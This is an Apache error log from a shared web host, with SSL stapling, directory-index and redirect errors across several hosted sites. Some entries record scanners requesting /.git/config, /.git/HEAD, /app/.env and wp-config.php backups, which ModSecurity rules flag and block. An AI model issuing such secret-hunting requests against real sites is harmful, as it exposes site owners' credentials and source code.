[Tue May 12 00:39:00.378398 2026] [autoindex:error] [pid 1605480:tid 1605528] [client 20.9.31.235:35182] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:39:01.473954 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:39:02.526049 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:39:07.489876 2026] [security2:error] [pid 1630927:tid 1630935] [client 43.128.73.132:37538] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "217.113.192.26"] [uri "/"] [unique_id "agJai2iGYYhUwDaJINm8EgAAAUU"]
[Tue May 12 00:39:08.127669 2026] [ssl:error] [pid 1601130:tid 1601157] (EAI 2)Name or service not known: [client 46.101.245.63:42942] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:08.127715 2026] [ssl:error] [pid 1601130:tid 1601157] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:10.522337 2026] [ssl:error] [pid 1606352:tid 1606435] (EAI 2)Name or service not known: [client 5.180.11.250:43311] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:10.522397 2026] [ssl:error] [pid 1606352:tid 1606435] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:11.677719 2026] [ssl:error] [pid 1601130:tid 1601158] (EAI 2)Name or service not known: [client 31.204.25.142:36053] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:11.677759 2026] [ssl:error] [pid 1601130:tid 1601158] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:12.569901 2026] [ssl:error] [pid 1691274:tid 1691294] (EAI 2)Name or service not known: [client 99.235.185.139:54366] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:12.569960 2026] [ssl:error] [pid 1691274:tid 1691294] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:16.393961 2026] [ssl:error] [pid 1601130:tid 1601171] (EAI 2)Name or service not known: [client 165.22.65.236:49126] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:16.394005 2026] [ssl:error] [pid 1601130:tid 1601171] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:17.939043 2026] [ssl:error] [pid 1630927:tid 1630934] (EAI 2)Name or service not known: [client 94.176.57.57:46733] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:17.939076 2026] [ssl:error] [pid 1630927:tid 1630934] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:21.307834 2026] [ssl:error] [pid 1691274:tid 1691281] (EAI 2)Name or service not known: [client 158.46.223.249:41697] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:21.307869 2026] [ssl:error] [pid 1691274:tid 1691281] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:27.327016 2026] [ssl:error] [pid 1601130:tid 1601150] (EAI 2)Name or service not known: [client 104.248.33.104:44724] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:27.327060 2026] [ssl:error] [pid 1601130:tid 1601150] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:27.707819 2026] [ssl:error] [pid 1601130:tid 1601171] (EAI 2)Name or service not known: [client 45.85.242.236:43289] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:27.707851 2026] [ssl:error] [pid 1601130:tid 1601171] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:30.596933 2026] [ssl:error] [pid 1606352:tid 1606425] (EAI 2)Name or service not known: [client 178.171.62.76:39103] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:30.596968 2026] [ssl:error] [pid 1606352:tid 1606425] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:30.799201 2026] [:error] [pid 1606352:tid 1606439] [client 176.110.217.104:40145] File does not exist: /home/kfr/public_html/xmlrpc.php
[Tue May 12 00:39:33.278275 2026] [ssl:error] [pid 1605480:tid 1605542] (EAI 2)Name or service not known: [client 200.236.198.242:51819] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:33.278311 2026] [ssl:error] [pid 1605480:tid 1605542] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:38.386763 2026] [ssl:error] [pid 1601130:tid 1601162] (EAI 2)Name or service not known: [client 161.35.20.191:47962] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:38.386811 2026] [ssl:error] [pid 1601130:tid 1601162] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:40.839578 2026] [ssl:error] [pid 1691274:tid 1691284] (EAI 2)Name or service not known: [client 209.20.168.155:37927] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:40.839630 2026] [ssl:error] [pid 1691274:tid 1691284] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:41.788371 2026] [ssl:error] [pid 1605480:tid 1605524] (EAI 2)Name or service not known: [client 185.81.187.159:39249] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:41.788404 2026] [ssl:error] [pid 1605480:tid 1605524] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:43.194149 2026] [ssl:error] [pid 1630927:tid 1630945] (EAI 2)Name or service not known: [client 101.128.108.33:24504] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:39:43.194182 2026] [ssl:error] [pid 1630927:tid 1630945] AH01941: stapling_renew_response: responder error
[Tue May 12 00:39:44.614362 2026] [:error] [pid 1601130:tid 1601158] [client 35.245.129.192:60226] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:39:44.714580 2026] [:error] [pid 1601130:tid 1601158] [client 35.245.129.192:60226] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:39:44.809705 2026] [:error] [pid 1601130:tid 1601158] [client 35.245.129.192:60226] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:39:44.904405 2026] [:error] [pid 1601130:tid 1601158] [client 35.245.129.192:60226] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:39:45.000655 2026] [:error] [pid 1601130:tid 1601158] [client 35.245.129.192:60226] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:39:45.097339 2026] [:error] [pid 1601130:tid 1601158] [client 35.245.129.192:60226] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:39:45.193051 2026] [autoindex:error] [pid 1601130:tid 1601158] [client 35.245.129.192:60226] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:39:53.795618 2026] [security2:error] [pid 1691274:tid 1691280] [client 43.135.135.57:59518] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/index.php"] [unique_id "agJauVfdQaraX_prmqf0wgAAAAM"]
[Tue May 12 00:40:01.406425 2026] [autoindex:error] [pid 1605480:tid 1605528] [client 20.9.31.235:35182] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:40:02.392520 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:40:03.311944 2026] [security2:error] [pid 1605480:tid 1605530] [client 43.166.247.155:42986] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/wp-admin/admin-ajax.php"] [unique_id "agJawx2Cvzd_nyNfUm8twwAAAQg"]
[Tue May 12 00:40:03.392061 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:40:20.874204 2026] [autoindex:error] [pid 1605480:tid 1605528] [client 20.9.31.235:35182] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:40:21.845822 2026] [autoindex:error] [pid 1691274:tid 1691490] [client 20.9.31.235:23231] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:40:22.860442 2026] [autoindex:error] [pid 1691274:tid 1691490] [client 20.9.31.235:23231] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:40:28.019249 2026] [security2:error] [pid 1630927:tid 1630937] [client 43.167.241.46:60296] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/"] [unique_id "agJa3GiGYYhUwDaJINm8kQAAAUc"]
[Tue May 12 00:40:29.859760 2026] [autoindex:error] [pid 1605480:tid 1605528] [client 20.9.31.235:35182] AH01276: Cannot serve directory /home/poledemo/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:40:30.839542 2026] [autoindex:error] [pid 1691274:tid 1691490] [client 20.9.31.235:23231] AH01276: Cannot serve directory /home/poledemo/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:40:36.534471 2026] [autoindex:error] [pid 1691274:tid 1691490] [client 20.9.31.235:23231] AH01276: Cannot serve directory /home/poledemo/public_html/wp-content/uploads/2021/02/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:40:54.651446 2026] [autoindex:error] [pid 1691274:tid 1691490] [client 20.9.31.235:23231] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:41:01.949520 2026] [security2:error] [pid 1606352:tid 1606425] [client 43.153.192.98:36132] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJa_Xo_DFxNSZVmaX3-OAAAAMY"]
[Tue May 12 00:41:06.732437 2026] [security2:error] [pid 1691274:tid 1691297] [client 129.226.95.137:37424] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJbAlfdQaraX_prmqf1NQAAABY"]
[Tue May 12 00:41:08.647481 2026] [security2:error] [pid 1605480:tid 1605526] [client 165.140.202.17:42194] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-de-mobilite-regional.com"] [uri "/.git/config"] [unique_id "agJbBB2Cvzd_nyNfUm8uPQAAAQQ"]
[Tue May 12 00:41:08.647695 2026] [security2:error] [pid 1605480:tid 1605526] [client 165.140.202.17:42194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-de-mobilite-regional.com"] [uri "/.git/config"] [unique_id "agJbBB2Cvzd_nyNfUm8uPQAAAQQ"]
[Tue May 12 00:41:08.656429 2026] [security2:error] [pid 1630927:tid 1630940] [client 165.140.202.17:42210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-de-mobilite-regional.com"] [uri "/.git/HEAD"] [unique_id "agJbBGiGYYhUwDaJINm81QAAAUo"]
[Tue May 12 00:41:08.656586 2026] [security2:error] [pid 1630927:tid 1630940] [client 165.140.202.17:42210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-de-mobilite-regional.com"] [uri "/.git/HEAD"] [unique_id "agJbBGiGYYhUwDaJINm81QAAAUo"]
[Tue May 12 00:41:09.637800 2026] [security2:error] [pid 1630927:tid 1630940] [client 165.140.202.17:42210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-de-mobilite-regional.com"] [uri "/index.php"] [unique_id "agJbBGiGYYhUwDaJINm81QAAAUo"]
[Tue May 12 00:41:09.704494 2026] [security2:error] [pid 1605480:tid 1605526] [client 165.140.202.17:42194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-de-mobilite-regional.com"] [uri "/index.php"] [unique_id "agJbBB2Cvzd_nyNfUm8uPQAAAQQ"]
[Tue May 12 00:41:17.976698 2026] [autoindex:error] [pid 1605480:tid 1605539] [client 20.9.31.235:29018] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:41:18.948217 2026] [autoindex:error] [pid 1691274:tid 1691490] [client 20.9.31.235:23231] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:41:33.371686 2026] [authz_core:error] [pid 1691274:tid 1691278] [client 20.220.233.65:64815] AH01630: client denied by server configuration: /home/hominfr/public_html/wp-config.php.backup
[Tue May 12 00:41:36.436132 2026] [authz_core:error] [pid 1691274:tid 1691278] [client 20.220.233.65:64815] AH01630: client denied by server configuration: /home/hominfr/public_html/backup.wp-config.php
[Tue May 12 00:41:39.104727 2026] [authz_core:error] [pid 1691274:tid 1691278] [client 20.220.233.65:64815] AH01630: client denied by server configuration: /home/hominfr/public_html/new-wp-config.php
[Tue May 12 00:42:15.920001 2026] [proxy_fcgi:error] [pid 1630927:tid 1630943] [client 4.193.137.131:19462] AH01071: Got error 'Primary script unknown'
[Tue May 12 00:42:42.930302 2026] [core:error] [pid 1691274:tid 1691295] [client 172.234.219.84:46218] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:42:42.930338 2026] [core:error] [pid 1691274:tid 1691295] [client 172.234.219.84:46218] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:42:43.037720 2026] [core:error] [pid 1605480:tid 1605527] [client 172.238.172.176:36664] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:42:43.037753 2026] [core:error] [pid 1605480:tid 1605527] [client 172.238.172.176:36664] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:42:43.133712 2026] [core:error] [pid 1630927:tid 1630954] [client 172.234.219.84:46220] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:42:43.133745 2026] [core:error] [pid 1630927:tid 1630954] [client 172.234.219.84:46220] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:42:43.346751 2026] [core:error] [pid 1606352:tid 1606424] [client 172.238.172.176:36670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:42:43.346778 2026] [core:error] [pid 1606352:tid 1606424] [client 172.238.172.176:36670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:42:54.811382 2026] [autoindex:error] [pid 1630927:tid 1630934] [client 154.36.110.119:45643] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:42:55.308545 2026] [autoindex:error] [pid 1630927:tid 1630934] [client 154.36.110.119:45643] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:42:56.261751 2026] [autoindex:error] [pid 1630927:tid 1630934] [client 154.36.110.119:45643] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:43:00.022065 2026] [security2:error] [pid 1630927:tid 1630954] [client 176.65.139.238:47576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/app/.env"] [unique_id "agJbdGiGYYhUwDaJINm9vgAAAVg"]
[Tue May 12 00:43:00.022376 2026] [security2:error] [pid 1630927:tid 1630954] [client 176.65.139.238:47576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/app/.env"] [unique_id "agJbdGiGYYhUwDaJINm9vgAAAVg"]
